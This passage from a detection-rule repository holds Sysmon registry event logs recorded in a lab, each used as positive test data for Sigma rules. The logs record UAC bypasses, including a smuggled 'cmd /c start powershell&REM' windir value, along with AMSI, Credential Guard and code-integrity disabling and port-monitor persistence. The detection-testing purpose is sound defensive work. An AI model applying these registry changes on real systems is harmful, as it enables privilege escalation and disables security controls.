\"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"EventType\": \"SetValue\",\n      \"UtcTime\": \"2025-10-26 17:33:36.131\",\n      \"ProcessGuid\": \"5AA13A44-5B70-68FE-4655-000000004002\",\n      \"ProcessId\": 8024,\n      \"Image\": \"C:\\\\Windows\\\\system32\\\\reg.exe\",\n      \"TargetObject\": \"HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Print\\\\Monitors\\\\AtomicRedTeam\\\\Driver\",\n      \"Details\": \"C:\\\\AtomicRedTeam\\\\atomics\\\\T1547.010\\\\bin\\\\PortMonitor.dll\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_add_port_monitor/info.yml",
    "content": "id: 8f807b19-07e7-4471-b4ff-d961f2e1d71f\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 944e8941-f6f6-4ee8-ac05-1c224e923c0e\n      title: Add Port Monitor Persistence in Registry\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/registry/registry_set/registry_set_add_port_monitor/944e8941-f6f6-4ee8-ac05-1c224e923c0e.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature/37b437cf-3fc5-4c8e-9c94-1d7c9aff842b.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 13,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 13,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-26T17:36:04.950926Z\"\n        }\n      },\n      \"EventRecordID\": 27665830,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"EventType\": \"SetValue\",\n      \"UtcTime\": \"2025-10-26 17:36:04.941\",\n      \"ProcessGuid\": \"5AA13A44-5C04-68FE-5855-000000004002\",\n      \"ProcessId\": 10080,\n      \"Image\": \"C:\\\\Windows\\\\system32\\\\reg.exe\",\n      \"TargetObject\": \"HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\\fAllowToGetHelp\",\n      \"Details\": \"DWORD (0x00000001)\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature/info.yml",
    "content": "id: a9bcd1ab-6556-4fc3-b9c9-724b335485e4\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 37b437cf-3fc5-4c8e-9c94-1d7c9aff842b\n      title: Allow RDP Remote Assistance Feature\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature/37b437cf-3fc5-4c8e-9c94-1d7c9aff842b.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_amsi_disable/aa37cbb0-da36-42cb-a90f-fdf216fc7467.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 13,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 13,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-12-25T10:58:31.890479Z\"\n        }\n      },\n      \"EventRecordID\": 16031,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3208,\n          \"ThreadID\": 1724\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"swachchhanda\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"EventType\": \"SetValue\",\n      \"UtcTime\": \"2025-12-25 10:58:31.888\",\n      \"ProcessGuid\": \"0197231E-EC48-694C-AA0C-000000000800\",\n      \"ProcessId\": 12456,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\n      \"TargetObject\": \"HKU\\\\S-1-5-21-2555720767-1205513275-3893774561-1001\\\\Software\\\\Microsoft\\\\Windows Script\\\\Settings\\\\AmsiEnable\",\n      \"Details\": \"DWORD (0x00000000)\",\n      \"User\": \"swachchhanda\\\\xodih\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_amsi_disable/info.yml",
    "content": "id: a02685df-b4dd-4f5b-b120-9127e1662022\ndescription: N/A\ndate: 2025-12-25\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\nrule_metadata:\n    - id: aa37cbb0-da36-42cb-a90f-fdf216fc7467\n      title: AMSI Disabled via Registry Modification\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/registry/registry_set/registry_set_amsi_disable/aa37cbb0-da36-42cb-a90f-fdf216fc7467.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_bypass_uac_using_delegateexecute/46dd5308-4572-4d12-aa43-8938f0184d4f.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 13,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 13,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-26T17:41:48.911849Z\"\n        }\n      },\n      \"EventRecordID\": 27772045,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"EventType\": \"SetValue\",\n      \"UtcTime\": \"2025-10-26 17:41:48.898\",\n      \"ProcessGuid\": \"5AA13A44-5D5B-68FE-7B55-000000004002\",\n      \"ProcessId\": 420,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\n      \"TargetObject\": \"HKU\\\\S-1-5-21-3960063115-309473240-3247002503-500_Classes\\\\Folder\\\\shell\\\\open\\\\command\\\\DelegateExecute\",\n      \"Details\": \"(Empty)\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_bypass_uac_using_delegateexecute/info.yml",
    "content": "id: 7fce1d05-2297-48a4-a670-f28745819c8a\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 46dd5308-4572-4d12-aa43-8938f0184d4f\n      title: Bypass UAC Using DelegateExecute\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/registry/registry_set/registry_set_bypass_uac_using_delegateexecute/46dd5308-4572-4d12-aa43-8938f0184d4f.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_bypass_uac_using_eventviewer/674202d0-b22a-4af4-ae5f-2eda1f3da1af.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 13,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 13,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-26T17:43:38.730630Z\"\n        }\n      },\n      \"EventRecordID\": 27806256,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"EventType\": \"SetValue\",\n      \"UtcTime\": \"2025-10-26 17:43:38.715\",\n      \"ProcessGuid\": \"5AA13A44-5DCA-68FE-8B55-000000004002\",\n      \"ProcessId\": 9920,\n      \"Image\": \"C:\\\\Windows\\\\system32\\\\reg.exe\",\n      \"TargetObject\": \"HKU\\\\S-1-5-21-3960063115-309473240-3247002503-500_Classes\\\\mscfile\\\\shell\\\\open\\\\command\\\\(Default)\",\n      \"Details\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_bypass_uac_using_eventviewer/info.yml",
    "content": "id: a6667fba-7437-4b37-8584-5de021f91115\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 674202d0-b22a-4af4-ae5f-2eda1f3da1af\n      title: Bypass UAC Using Event Viewer\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/registry/registry_set/registry_set_bypass_uac_using_eventviewer/674202d0-b22a-4af4-ae5f-2eda1f3da1af.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task/724ea201-6514-4f38-9739-e5973c34f49a.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 13,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 13,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-26T17:50:12.576627Z\"\n        }\n      },\n      \"EventRecordID\": 27929906,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"EventType\": \"SetValue\",\n      \"UtcTime\": \"2025-10-26 17:50:12.565\",\n      \"ProcessGuid\": \"5AA13A44-5F54-68FE-B455-000000004002\",\n      \"ProcessId\": 2768,\n      \"Image\": \"C:\\\\Windows\\\\system32\\\\reg.exe\",\n      \"TargetObject\": \"HKU\\\\S-1-5-21-3960063115-309473240-3247002503-500\\\\Environment\\\\windir\",\n      \"Details\": \"cmd /c start powershell&REM\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task/info.yml",
    "content": "id: 48965782-760d-4620-9bf3-7fb0bb441d0f\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 724ea201-6514-4f38-9739-e5973c34f49a\n      title: Bypass UAC Using SilentCleanup Task\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task/724ea201-6514-4f38-9739-e5973c34f49a.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_change_rdp_port/509e84b9-a71a-40e0-834f-05470369bd1e.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 13,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 13,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-26T18:10:21.083557Z\"\n        }\n      },\n      \"EventRecordID\": 28299540,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"EventType\": \"SetValue\",\n      \"UtcTime\": \"2025-10-26 18:10:21.071\",\n      \"ProcessGuid\": \"5AA13A44-640D-68FE-3756-000000004002\",\n      \"ProcessId\": 992,\n      \"Image\": \"C:\\\\Windows\\\\system32\\\\reg.exe\",\n      \"TargetObject\": \"HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\PortNumber\",\n      \"Details\": \"DWORD (0x00001189)\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_change_rdp_port/info.yml",
    "content": "id: 88bf1ccf-789d-4864-9eaf-547990ffe90a\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 509e84b9-a71a-40e0-834f-05470369bd1e\n      title: Default RDP Port Changed to Non Standard Port\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/registry/registry_set/registry_set_change_rdp_port/509e84b9-a71a-40e0-834f-05470369bd1e.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_change_security_zones/45e112d0-7759-4c2a-aa36-9f8fb79d3393.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 13,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 13,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-26T18:12:38.481829Z\"\n        }\n      },\n      \"EventRecordID\": 28344631,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"EventType\": \"SetValue\",\n      \"UtcTime\": \"2025-10-26 18:12:38.476\",\n      \"ProcessGuid\": \"5AA13A44-6494-68FE-6A56-000000004002\",\n      \"ProcessId\": 7460,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\n      \"TargetObject\": \"HKU\\\\S-1-5-21-3960063115-309473240-3247002503-500\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\\\Domains\\\\bad-domain.com\\\\bad-subdomain\\\\https\",\n      \"Details\": \"DWORD (0x00000002)\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 13,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 13,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-26T18:12:38.491176Z\"\n        }\n      },\n      \"EventRecordID\": 28344632,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"EventType\": \"SetValue\",\n      \"UtcTime\": \"2025-10-26 18:12:38.476\",\n      \"ProcessGuid\": \"5AA13A44-6494-68FE-6A56-000000004002\",\n      \"ProcessId\": 7460,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\n      \"TargetObject\": \"HKU\\\\S-1-5-21-3960063115-309473240-3247002503-500\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\\\Domains\\\\bad-domain.com\\\\bad-subdomain\\\\http\",\n      \"Details\": \"DWORD (0x00000002)\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 13,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 13,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-26T18:12:38.500426Z\"\n        }\n      },\n      \"EventRecordID\": 28344633,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"EventType\": \"SetValue\",\n      \"UtcTime\": \"2025-10-26 18:12:38.492\",\n      \"ProcessGuid\": \"5AA13A44-6494-68FE-6A56-000000004002\",\n      \"ProcessId\": 7460,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\n      \"TargetObject\": \"HKU\\\\S-1-5-21-3960063115-309473240-3247002503-500\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\\\Domains\\\\bad-domain.com\\\\bad-subdomain\\\\*\",\n      \"Details\": \"DWORD (0x00000002)\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_change_security_zones/info.yml",
    "content": "id: a118df85-dbf8-48d6-a3a6-f6ddebf975b6\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 45e112d0-7759-4c2a-aa36-9f8fb79d3393\n      title: IE Change Domain Zone\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/registry/registry_set/registry_set_change_security_zones/45e112d0-7759-4c2a-aa36-9f8fb79d3393.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_credential_guard_disabled/73921b9c-cafd-4446-b0c6-fdb0ace42bc0.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 13,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 13,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-12-26T06:45:50.191274Z\"\n        }\n      },\n      \"EventRecordID\": 23575,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3484,\n          \"ThreadID\": 3424\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"swachchhanda\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"EventType\": \"SetValue\",\n      \"UtcTime\": \"2025-12-26 06:45:50.187\",\n      \"ProcessGuid\": \"0197231E-2F1D-694E-F304-000000000A00\",\n      \"ProcessId\": 12232,\n      \"Image\": \"C:\\\\WINDOWS\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\n      \"TargetObject\": \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\DeviceGuard\\\\EnableVirtualizationBasedSecurity\",\n      \"Details\": \"DWORD (0x00000000)\",\n      \"User\": \"swachchhanda\\\\xodih\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_credential_guard_disabled/info.yml",
    "content": "id: 7d8d93c3-25b2-4225-9f91-66997f5b446f\ndescription: N/A\ndate: 2025-12-26\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\nrule_metadata:\n    - id: 73921b9c-cafd-4446-b0c6-fdb0ace42bc0\n      title: Windows Credential Guard Disabled - Registry\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/registry/registry_set/registry_set_credential_guard_disabled/73921b9c-cafd-4446-b0c6-fdb0ace42bc0.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled/8b7273a4-ba5d-4d8a-b04f-11f2900d043a.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 13,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 13,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-26T18:22:33.661127Z\"\n        }\n      },\n      \"EventRecordID\": 28528165,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"EventType\": \"SetValue\",\n      \"UtcTime\": \"2025-10-26 18:22:33.654\",\n      \"ProcessGuid\": \"5AA13A44-66E9-68FE-AC56-000000004002\",\n      \"ProcessId\": 7108,\n      \"Image\": \"C:\\\\Windows\\\\system32\\\\reg.exe\",\n      \"TargetObject\": \"HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\DeviceGuard\\\\Scenarios\\\\HypervisorEnforcedCodeIntegrity\\\\Enabled\",\n      \"Details\": \"DWORD (0x00000000)\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled/info.yml",
    "content": "id: b60c9c4c-27e7-4870-af1d-f35582a44c07\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 8b7273a4-ba5d-4d8a-b04f-11f2900d043a\n      title: Windows Hypervisor Enforced Code Integrity Disabled\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/registry/registry_set/registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled/8b7273a4-ba5d-4d8a-b04f-11f2900d043a.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_disable_administrative_share/c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 13,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 13,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-26T18:29:32.286061Z\"\n        }\n      },\n      \"EventRecordID\": 28656599,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"EventType\": \"SetValue\",\n      \"UtcTime\": \"2025-10-26 18:29:32.271\",\n      \"ProcessGuid\": \"5AA13A44-688C-68FE-D556-000000004002\",\n      \"ProcessId\": 2712,\n      \"Image\": \"C:\\\\Windows\\\\system32\\\\reg.exe\",\n      \"TargetObject\": \"HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\LanmanServer\\\\Parameters\\\\AutoShareServer\",\n      \"Details\": \"DWORD 